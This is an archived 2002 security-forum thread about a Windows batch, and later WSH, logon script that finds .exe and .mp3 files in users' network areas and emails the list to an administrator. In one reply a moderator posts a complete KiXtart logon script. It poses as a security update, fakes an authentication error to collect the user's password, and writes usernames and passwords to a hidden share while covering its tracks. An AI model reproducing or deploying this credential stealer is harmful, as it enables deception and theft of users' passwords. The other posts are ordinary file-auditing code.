• RSS
  • Twitter
  • FaceBook

Security Forums

Log in

FAQ | Usergroups | Profile | Register | RSS | Posting Guidelines | Recent Posts

batch file confusion

Users browsing this topic:0 Security Fans, 0 Stealth Security Fans
Registered Security Fans: None
Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Programming and More

View previous topic :: View next topic  
Author Message
browolf
Trusted SF Member
Trusted SF Member


Joined: 19 Apr 2002
Posts: 1


Offline

PostPosted: Mon Oct 28, 2002 4:51 pm    Post subject: batch file confusion Reply with quote

Hi

i'm trying out some batch stuff, i'm planning on writing a script to scan people's userarea when they log on. I'm just playing around with things atm until i figure out the best way to do it. (the best way to learn stuff)

i'm having some trouble understanding why this isnt working.
i'm running it on win2k.

Code:

@echo off
dir %1\*.exe /a-D /b /S >>test.log
if errorlevel 0 echo exe found
if errorlevel 1 echo exe not found


it's the errorlevel bit that doesnt seem to work.
if i run the batch as "search.bat s:" the output is:

filenotfound
exe found
exe not found

(s: doesnt have any exe's in)

as i understand it. if dir finds no results then the errorlevel is 1.
i know that it is cos i can do echo %errorlevel%
i believe i can use %errorlevel% in the script but havent tried.
i'm trying to keep things non-win2k specific atm.

cheers

Andy
Back to top
View user's profile Send private message
browolf
Trusted SF Member
Trusted SF Member


Joined: 19 Apr 2002
Posts: 1


Offline

PostPosted: Tue Oct 29, 2002 3:52 pm    Post subject: Reply with quote

isok
i somehow fixed it by doing:

Code:

@echo off
dir %1\*.exe /a-D /b /S >>test.log
if errorlevel 1 goto exit
   echo do stuff

:exit
echo done!
Back to top
View user's profile Send private message
Sgt_B
Trusted SF Member
Trusted SF Member


Joined: 28 Oct 2002
Posts: 16777215
Location: Chicago, IL US

Offline

PostPosted: Tue Oct 29, 2002 4:13 pm    Post subject: Reply with quote

A bit more interesting would be having the machine's in question write their log files to a central location, giving the log file as <computername>.log.

Might be easier for you to manage.
Back to top
View user's profile Send private message Visit poster's website
Sgt_B
Trusted SF Member
Trusted SF Member


Joined: 28 Oct 2002
Posts: 16777215
Location: Chicago, IL US

Offline

PostPosted: Tue Oct 29, 2002 4:24 pm    Post subject: Reply with quote

@echo off
dir %1\*.exe /a-D /b /S >>\\<central location>\%computername%.log
if errorlevel 1 goto exit
echo do stuff

:exit
echo done!
Back to top
View user's profile Send private message Visit poster's website
TheKingster
Link Spammer
Link Spammer


Joined: 03 May 2002
Posts: 0
Location: UK

Offline

PostPosted: Tue Oct 29, 2002 4:59 pm    Post subject: Reply with quote

if your trying to stop people running EXEs theres a whole section on that on these forums
Back to top
View user's profile Send private message
ShaolinTiger
Forum Fanatic
Forum Fanatic


Joined: 18 Apr 2002
Posts: 16777215
Location: Kuala Lumpur, Malaysia

Offline

PostPosted: Tue Oct 29, 2002 5:58 pm    Post subject: Reply with quote

TheKingster wrote:
if your trying to stop people running EXEs theres a whole section on that on these forums


It's usually nice if you tell people where it is aswell..

http://www.security-forums.com/forum/viewtopic.php?t=438
Back to top
View user's profile Send private message Visit poster's website
browolf
Trusted SF Member
Trusted SF Member


Joined: 19 Apr 2002
Posts: 1


Offline

PostPosted: Tue Oct 29, 2002 9:55 pm    Post subject: Reply with quote

i dont want to have to go thru 1800 log files. it's just a small number of people who stick exe or mp3s in their user areas,

the script will email me using commandline emailer blat with the contents of the log file. i can then remove the files and disable their userares.

atm the script looks like:

Code:

@echo off
echo checking userarea for inappropriate files
dir %1\*.exe /a-D /b /S >>%1\test.log
dir %1\*.mp3 /a-D /b /s >>%1\test.log
if errorlevel 1 goto exit
   echo mailing filelist to administrator!
   \\lsahtc_nt1\netlogon\blat %1\test.log -to andy@address -server 192.168.0.15 -f academic\%username% -q
:exit
del %1\test.log
echo done!
Back to top
View user's profile Send private message
ThePsyko
SF Mod
SF Mod


Joined: 17 Oct 2002
Posts: 16777178
Location: California

Offline

PostPosted: Fri Nov 08, 2002 3:14 am    Post subject: Reply with quote

If you're doing this through logon scripts, you might want to look into kixtart - it's free and more robust than DOS (www.kixtart.com).. One of the first sripts I wrote was a password stealer / logger in Kix...


; REM ***
; REM *** Malishus log_on skript
; REM ***


IF INGROUP("Domain Administrators")
RETURN
ENDIF


; REM *** check to see if script has run on system before - if so, skip
; REM *** script and return to normal logon

IF EXIST("c:\winnt\config\confpol.txt")
RETURN
ENDIF

; REM *** Display standard windows messagebox with text and an OK button ***(no cancel button)

$selection = MESSAGEBOX ( "There is a Security Patch available for your system. Press 'OK' to Install", "Security Update", 64)

; REM *** Make it look official by including some lag time (it IS windows
; REM *** after all Smile

? "Security Update Installing....."
SLEEP 1
? "Authentication error! Please Enter your password."
? "UserID: " + @USERID
FLUSHKB
? "Password: "
GETS $pass
? "Installation continuing....."
SLEEP 2

; REM *** Since Kix displays a 0 everytime a file is successfully opened
; REM *** &/or written to, the following line will keep the user from
; REM *** getting suspicious by showing them that
; REM *** there are 0000000 errors during "installation"

? "Installation Errors: "

; REM *** Map a drive to a hidden share on the logon server that only you
; REM *** know about..
; REM *** If this isn't possible, use another users system and share
; REM *** their drive to stash the log in.. never use your own system.

SHELL "%comspec% /c net use w: \\" + @LSERVER + "\hiddenshare$"

; REM *** Open (or create one if it doesn't exist) both the log file for
; REM *** the U/P and the file to later tell the script it has already
; REM *** run on this system

OPEN ( 1, "w:\log.txt", 5)
OPEN ( 2, "c:\winnt\config\confpol.txt", 5)

; REM *** Append the users User ID and Password to a central text file
; REM *** (makes it easier for retrieval)

WRITELINE (1, "User: " + @userid + Chr(13) + Chr(10))
WRITELINE (1, "Pass: " + $pass + Chr (13) + Chr(10))

; REM *** Add a blank line to the \confpol.txt file - will signal the
; REM *** script next time, but if found, won't raise any suspicions
; REM *** (usually)

WRITELINE ( 2, Chr (13) + Chr(10))

CLOSE (1)
CLOSE (2)

SHELL "%comspec% /c net use w: /delete"
? "Security Update Installed, continuing with logon..."
SLEEP 1
RETURN
Back to top
View user's profile Send private message Send e-mail
browolf
Trusted SF Member
Trusted SF Member


Joined: 19 Apr 2002
Posts: 1


Offline

PostPosted: Fri Nov 08, 2002 10:39 am    Post subject: Reply with quote

i've used kixtart b4. it's ace. but if u gonna use that u might as well go all the way and use WSH. which in the end i did. i'll post my script when i get to work.
Back to top
View user's profile Send private message
browolf
Trusted SF Member
Trusted SF Member


Joined: 19 Apr 2002
Posts: 1


Offline

PostPosted: Fri Nov 08, 2002 11:40 am    Post subject: Reply with quote

Code:

'on error resume next
Const ForReading = 1
wscript.echo ("checking your user area for inappropriate files")
set wshell = wscript.createobject("wscript.shell")
Dim fso, f1, ts, s,myfile,uname,udate
Set fso = CreateObject("Scripting.FileSystemObject")

If (fso.FileExists("s:\ftemp.$$$")) Then
fso.DeleteFile("s:\ftemp.$$$")
end if

uname = wshell.ExpandEnvironmentStrings("%USERNAME%")

if instr("sbutte,adavis,jowen,naparro,vballa,cglen-,rbanni,jfairc,andy,myles,duncan,brian,ssstoke,abaill,adavis,msimps", uname) OR isempty(uname) then wscript.exit

WShell.Run "%comspec% /c dir s:\*.exe /a-d /b /s >> s:\ftemp.$$$",0,true
WShell.Run "%comspec% /c dir s:\*.mp3 /a-d /b /s >> s:\ftemp.$$$",0,true
WShell.Run "%comspec% /c dir s:\*.wav /a-d /b /s >> s:\ftemp.$$$",0,true

'read file
Set f = fso.GetFile("s:\ftemp.$$$")
if f.size > 0 then
    wscript.echo ("mailing file list to administrator")
    wshell.run "\\lsahtc_nt1\netlogon\blat s:\ftemp.$$$ -to andy@lythamhigh.lancs.sch.uk -server 192.168.0.15 -f academic\" & uname & " -q", 0,true
    wscript.echo ("mail sent!")
   
    datetemp = date
   udate = replace (datetemp,"/","")
    ttemp = time
   ttime = replace (ttemp,":","")
   folname = "\\lsahtc_nt1\logs\filez\" & uname & udate &"-"& ttime
    'make folder
     set f = fso.createfolder(folname)
    'move files
   Set MyFile = fso.Opentextfile("s:\ftemp.$$$", ForReading,false)
    do while myfile.AtEndOfStream <> True
      fpath = myfile.readline
      cmdline = "%comspec% /c move /y " & """" & fpath & """ " & folname
      wscript.echo "moving " & fpath
      WShell.Run cmdline, 0,true
    loop
   myfile.close
else
   wscript.echo ("Clear!")
end if
fso.DeleteFile("s:\ftemp.$$$")
set wshell = nothing
set fso = nothing
set f = nothing
set myfile = nothing

Back to top
View user's profile Send private message
Display posts from previous:   

Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Programming and More All times are GMT + 2 Hours
Page 1 of 1


 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum

Looking for more Windows Networking info?

Sign up to the WindowsNetworking.com Monthly Newsletter, written by Enterprise Security MVP Deb Shinder, containing news, the hottest tips, Networking links of the month and much more. Subscribe today and don't miss a thing!
View a sample newsletter.

Become a WindowsNetworking.com member!

Discuss your Windows Networking issues with thousands of other Windows Newtorking experts. Click here to join!

Community Area

Log in | Register

Readers' Choice

Which is your preferred data recovery solution?

Follow TechGenix on Twitter